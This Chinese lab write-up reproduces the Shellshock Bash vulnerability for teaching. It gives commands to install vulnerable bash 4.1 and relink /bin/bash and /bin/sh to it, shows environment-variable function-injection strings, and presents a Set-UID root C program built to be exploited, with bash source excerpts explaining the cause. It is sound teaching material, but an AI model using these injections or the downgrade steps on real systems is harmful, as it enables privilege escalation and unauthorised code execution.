一、 实验描述

2014年9月24日,Bash中发现了一个严重漏洞shellshock,该漏洞可用于许多系统,并且既可以远程也可以在本地触发。在本实验中,学生需要亲手重现攻击来理解该漏洞,并回答一些问题。

二、 预备知识

1. 什么是ShellShock?

Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。——摘自维基百科

2. 进行实验所需的准备

1. 环境搭建

以root权限安装4.1版bash(4.2版本以上的漏洞已经被堵上了) bash4.1 下载地址:http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz

下载

# wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz

安装

# tar xf bash-4.1.tar.gz
# cd bash-4.1
# ./configure
# make & make install
这几句语句是运行时间最长的,网速不好的情况下在这一步重复输入了很多次。

链接

# rm /bin/bash
# ln -s /usr/local/bin/bash /bin/bash

到这里就安装完了,接下来检测是否存在shellshock漏洞。

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test "

输出vulnerable,说明bash有漏洞。

最后,让/bin/sh 指向/bin/bash.

$ sudo ln -sf /bin/bash /bin/sh

现在一切就绪,进入下一步吧。

2.预备知识

了解bash自定义函数,只需要函数名就能够调用该函数。

$ foo() { echo bar; }

$ foo

> bar

这个时候的Bash的环境变量:

KEY = fooVALUE = () { echo bar; }

来看看ShellShock漏洞的真身:

export foo=’() { :; }; echo Hello World’

bash

>Hello World

怎么样?看明白了没?为什么调用bash的时候输出Hello World了呢? 瞧瞧他内部的情况:

KEY = fooVALUE = () { :; }; echo Hello World

bash读取了环境变量,在定义foo之后直接调用了后面的函数。 一旦调用bash,自定义的语句就直接触发。

到了这,你有想到什么么,联系之前的Set-UID课程。 对!干坏事的孩子会被警察叔叔抓走的:)

不多说了,来get root权限吧!

三、 实验内容

1.攻击Set-UID程序

本实验中,我们通过攻击Set-UID程序来获得root权限。 首先,确保安装了带有漏洞的bash版本,并让/bin/sh 指向/bin/bash.

$ sudo ln -sf /bin/bash /bin/sh

请编译下面这段代码,并设置其为Set-UID程序,保证它的所有者是root。我们知道system()函数将调用"/bin/sh -c" 来运行指定的命令, 这也意味着/bin/bash 会被调用,你能够利用shellshock漏洞来获取权限么?

#include <stdio.h>voidmain(){

    setuid(geteuid()); // make real uid = effective uid.

    system("/bin/ls -l");

}

我们注意到这里使用了setuid(geteuid()) 来使real uid = effective uid,这在Set-UID程序中不是普遍实践,但它确实有时会发生。 先自己试着hack一下:)以下是hack过程。


如果 setuid(geteuid()) 语句被去掉了,再试试看攻击,我们还能够拿到权限么?



#include <stdio.h>voidmain(){

    system("/bin/ls -l");

}




把setuid(geteuid())语句去掉之后无法获得权限。


这就说明如果 real uid 和 effective uid 相同的话,定义在环境变量中的内容在该程序内有效,那样shellshock漏洞就能够被利用了。但是如果两个uid不同的话,环境变量失效,就无法发动攻击了,这可以从bash的源代码中得到印证(variables.c,在308到369行之间)请指出是哪一行导致了这样的不同,并说明bash这样设计的原因。


这里给出这部分代码


/* Initialize the shell variables from the current environment.

   If PRIVMODE is nonzero, don't import functions from ENV or

   parse $SHELLOPTS. */voidinitialize_shell_variables(env, privmode)char **env;

     int privmode;

{

  char *name, *string, *temp_string;

  int c, char_index, string_index, string_length;

  SHELL_VAR *temp_var;

  create_variable_tables ();

  for (string_index = 0; string = env[string_index++]; )

    {

      char_index = 0;

      name = string;

      while ((c = *string++) && c != '=')

  ;

      if (string[-1] == '=')

  char_index = string - name - 1;

      /* If there are weird things in the environment, like `=xxx' or a

   string without an `=', just skip them. */if (char_index == 0)

  continue;

      /* ASSERT(name[char_index] == '=') */

      name[char_index] = '\0';

      /* Now, name = env variable name, string = env variable value, and

   char_index == strlen (name) */

      temp_var = (SHELL_VAR *)NULL;

      /* If exported function, define it now.  Don't import functions from

   the environment in privileged mode. */if (privmode == 0 && read_but_dont_execute == 0 && STREQN ("() {", string, 4))

  {

    string_length = strlen (string);

    temp_string = (char *)xmalloc (3 + string_length + char_index);

    strcpy (temp_string, name);

    temp_string[char_index] = ' ';

    strcpy (temp_string + char_index + 1, string);

    parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST);

    /* Ancient backwards compatibility.  Old versions of bash exported

       functions like name()=() {...} */if (name[char_index - 1] == ')' && name[char_index - 2] == '(')

      name[char_index - 2] = '\0';

    if (temp_var = find_function (name))

      {

        VSETATTR (temp_var, (att_exported|att_imported));

        array_needs_making = 1;

      }

    elsereport_error(_("error importing function definition for `%s'"), name);

    /* ( */if (name[char_index - 1] == ')' && name[char_index - 2] == '\0')

      name[char_index - 2] = '(';   /* ) */

  }




摘出其中关键部分并简化


voidinitialize_shell_variables(){

// 循环遍历所有环境变量for (string_index = 0; string = env[string_index++]; ) {

     /*...*//* 如果有export过的函数, 在这里定义 *//* 无法导入在特权模式下(root下)定义的函数 */if (privmode == 0 && read_but_dont_execute == 0 &&

           STREQN (“() {“, string, 4)) {

           [...]

           // 这里是shellshock发生的地方// 传递函数定义 + 运行额外的指令

           parse_and_execute (temp_string, name,

                SEVAL_NONINT|SEVAL_NOHIST);

[...]

} }




就是上述那一行判断逻辑导致了两者的不同,primode即私有模式,要求real uid 与 effective uid保持一致。


四、实验总结


Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。


这次的实验内容比较少,但由于网速原因还是做了很久。实验结束了但是实验的过程还是有一些理解模糊的地方。
												


											
ShellShock 攻击实验的更多相关文章
	

    
						
  1. 《Linux内核原理与设计》第十一周作业 ShellShock攻击实验
		
    <Linux内核原理与设计>第十一周作业 ShellShock攻击实验 分组: 和20179215袁琳完成实验及博客攥写 实验内容:   Bash中发现了一个严重漏洞shellshock, ...
    
		
    2. 
						
  2. 2017-2018-1 20179215 第十一周 ShellShock攻击实验
		
    <Linux内核原理与设计>第十一周作业 ShellShock攻击实验 分组:和20179205王雅哲共同完成实验及博客攥写 实验内容:  Bash中发现了一个严重漏洞shellshock ...
    
		
    3. 
								
  3. Mininet实验 基于Mininet实现BGP路径挟持攻击实验
		
    参考:基于Mininet实现BGP路径挟持攻击实验 实验目的: 掌握如何mininet内模拟AS. 掌握BGP路径挟持的原理和分析过程. 实验原理: 互联网是由相互连接的自治系统AS组成的,通过一个通 ...
    
		
    4. 
						
  4. CSAPP缓冲区溢出攻击实验(上)
		
    CSAPP缓冲区溢出攻击实验(上) 下载实验工具.最新的讲义在这. 网上能找到的实验材料有些旧了,有的地方跟最新的handout对不上.只是没有关系,大体上仅仅是程序名(sendstring)或者參数 ...
    
		
    5. 
						
  5. CSAPP缓冲区溢出攻击实验(下)
		
    CSAPP缓冲区溢出攻击实验(下) 3.3 Level 2: 爆竹 实验要求 这一个Level的难度陡然提升,我们要让getbuf()返回到bang()而非test(),并且在执行bang()之前将g ...
    
		
    6. 
						
  6. Ubuntu下缓冲器溢出攻击实验(可以看看问题分析)
		
    缓冲器溢出攻击实验题目: 下边的代码摘自<黑客攻防技术宝典——系统实战篇(第 2 版)>2.5 节,攻击该代码,获得root 权限,实现相应的效果. strcpy(little_array ...
    
		
    7. 
						
  7. ms08_067攻击实验
		
    ms08_067攻击实验 ip地址 开启msfconsole 使用search ms08_067查看相关信息 使用 show payloads ,确定攻击载荷 选择playoad,并查看相关信息 设置 ...
    
		
    8. 
						
  8. 20145305 《网络对抗》注入Shellcode并执行&Return-to-libc 攻击实验
		
    注入Shellcode并执行 实践指导书 实践过程及结果截图 准备一段Shellcode 我这次实践和老师用的是同一个 设置环境 构造要注入的payload 我决定将返回地址改为0xffffd3a0  ...
    
		
    9. 
						
  9. 20145330 《网络对抗》PC平台逆向破解:注入shellcode  和 Return-to-libc 攻击实验
		
    20145330 <网络对抗>PC平台逆向破解:注入shellcode 实验步骤 1.用于获取shellcode的C语言代码 2.设置环境 Bof攻击防御技术 需要手动设置环境使注入的sh ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. VB.net的特殊语法(区别于C#.NET)
			
    1:引入命名空间(Imports) Imports System.Exception Imports System.Data.SqlClient Imports System.Security.Cry ...
    
			
    2. 
						
  2. winform右下角弹窗
			
    网页是否经常在电脑右下角弹窗显示消息?其实Winform也是可以实现的.下面介绍两种方法. 第一步:设计窗体 第二步:实现代码 第一种方法 引用user32 声明常量 窗体Load事件 窗体FormC ...
    
			
    3. 
						
  3. java利用Scanner获取键盘输入
			
    首发地址:我的网易博客 在运行一个java程序的时候,可能我们需要在运行的时候传递一些参数进去...咋办呢... java提供了一个Scanner类,利用这个类,我们可以很方便的获取键盘输入的参数.. ...
    
			
    4. 
						
  4. 【转】 linux编程之GDB调试
			
    GDB是一套字符界面的程序集,可以用它在linux上调试C和C++程序,它提供了以下的功能: 1 在程序中设置断点,当程序运行到断点处暂停 2 显示变量的值,可以打印或者监视某个变量,将某个变量的值显 ...
    
			
    5. 
						
  5. 在Spring里进行单元测试Junit
			
    搭建Spring环境(自行搭建): @RunWith注解指定使用springJunit的测试运行器 @ContextConfiguration注解指定测试用的spring配置文件的位置 import  ...
    
			
    6. 
						
  6. Hibernate连数据库
			
    1.建数据库,建表(一定要设主码) create database Hibernate create table Students( sno char(10) primary key, sna cha ...
    
			
    7. 
						
  7. match() vs search()
			
    match() 函数只检查 RE 是否在字符串开始处匹配,而 search() 则是扫描整个字符串.记住这一区别是重要的.记住,match() 只报告一次成功的匹配,它将从 0 处开始:如果匹配不是从 ...
    
			
    8. 
						
  8. 不在折腾---hbase-0.96.2-hadoop2
			
    首先安装好zookeeper集群 上传hbase安装包 解压 配置hbase集群,要修改3个文件 * 修改hbase-env.sh 设置JAVA_HOME: export JAVA_HOME=...  ...
    
			
    9. 
						
  9. Win10重复按键盘经常按不出?Win10关闭筛选键步骤
			
    在Win10系统中,有用户发现,有时重复按一个键位,经常会出现打不出字符的情况,导致输入效率降低,其实这很有可能是你开启了筛选键导致,筛选键帮助用户忽略那些短时间的按键动作,下面我们就来看看win10 ...
    
			
    10. 
						
  10. CProgressCtrl进度条
			
    CProgressCtrl进度条 使用方法总结 标签: CProgressCtrlmfc 2016-03-03 09:19 762人阅读 评论(0) 收藏 举报  分类: MFC(11)  版权声明: ...
    
			
    11.